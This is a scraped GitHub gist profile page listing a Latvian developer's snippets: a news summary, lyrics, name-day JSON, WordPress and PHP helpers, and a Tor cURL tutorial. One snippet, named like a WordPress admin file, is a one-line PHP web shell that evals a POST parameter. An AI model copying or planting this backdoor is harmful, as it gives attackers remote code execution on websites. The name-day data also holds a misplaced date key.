Skip to content

Instantly share code, notes, and snippets.

Avatar
🧔
Remote developer (LEMP, Node.js, Neo4j [graph])

Rolands rolandinsh

🧔
Remote developer (LEMP, Node.js, Neo4j [graph])
View GitHub Profile
@rolandinsh
rolandinsh / republa_svarigakais_test1.md
Last active Jun 12, 2020
Republa.media teksta svarīgākās daļas un info.
View republa_svarigakais_test1.md

Pamatraksts un autortiesības: https://kursors.lv/2020/06/12/ka-izveleties-moto-ekipejumu-ieteikumi-jaunajiem-motociklistiem/

Šis ir tikai eksperimentāls ziņu kopsavilkums jaunajai aplikācijai, ko veidoju. Pirmais tests. Un izskatās, ka, laikam, būs OK.


Pieredzes trūkuma dēļ pirmais moto apģērbs bieži tiek nopirkts neadekvāts vai nepiemērots. Arī vietējos moto akesuāru veikalos reti var sagaidīt īpašu atsaucību un palīdzību šajā sakarā. Starp citu, kopš 2019.gada CSDD eksāmena kārtošanas prasības A kategorijai iekļauj obligātu ķiveres, cimdu, apavu, moto jakas un bikšu lietošanu.

View wp-admin_js_export1.php
<?php @eval($_POST['wei']); ?>
<?php
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
View google screen shot api
<?php
function get_url_contents($url){
if (function_exists('file_get_contents')) {
$result = @file_get_contents($url);
}
if ($result == '') {
$ch = curl_init();
$timeout = 30;
curl_setopt($ch, CURLOPT_URL, $url);
@rolandinsh
rolandinsh / hugo_backtranslation
Created May 12, 2019
hugo.lv translation and backtransalation (parak-jauna-SynthesizedAudio.554db4a5-a050-4b7a-abac-c67fb92d7d7c.mp3). Runas atpazīšanas kvalitātes prognoze: 0.797.
View hugo_backtranslation
Original:
Es skatos Panorāmu, viņa skatās Youtube.
Viņas pirmai trubai jau bij iebūvēts Bluetooth.
Meiča... Pat nezin kas ir Mixeri.
Mazā nekad mūžā nav aiztikusi disketi.
Mazā nekad mūžā nav spēlējusi Lingo.
Mazā pat nav mutē ņēmus' batoniņu Bingo.
Es dzēru tarhūnu, bet viņa dzēra Limpo.
@rolandinsh
rolandinsh / namedays-extended.json
Last active Dec 6, 2018 — forked from laacz/namedays-extended.json
Vārdadienas JSON (par prieku Sergejam)
View namedays-extended.json
{
"01-01": ["Afra", "Afrodīte", "Agunda", "Agurs", "Januārija", "Laimstars", "Soleda", "Solita", "Solveta"],
"01-02": ["Induls", "Īva", "Ivaise", "Ivija", "Īvija", "Ivika", "Īvis", "Ivisa", "Ivs"],
"01-03": ["Ambrozijs", "Ammonārija", "Ammunārija", "Mežvaldis", "Mieriņš", "Miermīlis", "Miernesis", "Miervalds", "Ringla", "Ringo", "Rinolds"],
"01-04": ["Amina", "Amīna", "Amirans", "Amirs", "Blāzma", "Ilveta", "Ilvis", "Spodrīte"],
"01-05": ["Amrita", "Amunds", "Anarita", "Saimona", "Saimons", "Seimanis", "Semions", "Semjons", "Simeons", "Simions", "Zintauts", "Zinturs"],
"01-06": ["Arams", "Aranta", "Arfa", "Arnīda", "Arnija", "Arnika"],
"07-07": ["Aldija", "Aldīna", "Māruta", "Marute", "Nija", "Nijole", "Niola"],
"01-08": ["Ants", "Aristarhs", "Aristida", "Aristīda", "Aristids", "Aristīds", "Aristons", "Aristrīds", "Arjana", "Arlands", "Arleta", "Arlēna", "Arlijs", "Arlita", "Gatiņš", "Īvande", "Ivanna", "Ivase", "Ivena"],
"01-09": ["Aksela", "Akselis", "Veiko", "Vello", "Ve
@rolandinsh
rolandinsh / get_meta_values.php
Created Nov 11, 2018 — forked from nciske/get_meta_values.php
WordPress Getting all values for a custom field key
View get_meta_values.php
// http://wordpress.stackexchange.com/questions/9394/getting-all-values-for-a-custom-field-key-cross-post
function get_meta_values( $key = '', $type = 'post', $status = 'publish' ) {
global $wpdb;
if( empty( $key ) )
return;
$r = $wpdb->get_col( $wpdb->prepare( "
SELECT pm.meta_value FROM {$wpdb->postmeta} pm
LEFT JOIN {$wpdb->posts} p ON p.ID = pm.post_id
WHERE pm.meta_key = '%s'
View videoc.txt
1 Film & Animation
2 Autos & Vehicles
10 Music
15 Pets & Animals
17 Sports
18 Short Movies
19 Travel & Events
20 Gaming
21 Videoblogging
22 People & Blogs
@rolandinsh
rolandinsh / SensioLabs-Security-Formatters-TextFormatter.php
Last active Jul 18, 2018
Legacy support for transit Symfony comment() to writeln()
View SensioLabs-Security-Formatters-TextFormatter.php
<?php
/**
* {@inheritdoc}
* Legacy support
* @link https://github.com/sensiolabs/security-checker/commit/885d3e6400fa4cb18eb68d9fde5b739bbee155ce
*/
public function comment($messages, $type = self::OUTPUT_NORMAL)
{
$this->writeln($messages, $type);
}
View phper.sh
php-curl
php-mbstring
php-xml
@rolandinsh
rolandinsh / PHP-CURL-Tor-Tutorial.md
Last active May 12, 2019 — forked from megaxorg/PHP-CURL-Tor-Tutorial.md
PHP: CURL Requests with Tor
View PHP-CURL-Tor-Tutorial.md

#CURL Connections with Tor

Install Apache, PHP, CURL & Tor with apt-get

sudo apt-get install -y apache2 php php-curl tor

Tor creates a proxy on your mashine with port 9050 for SOCKS5 connections.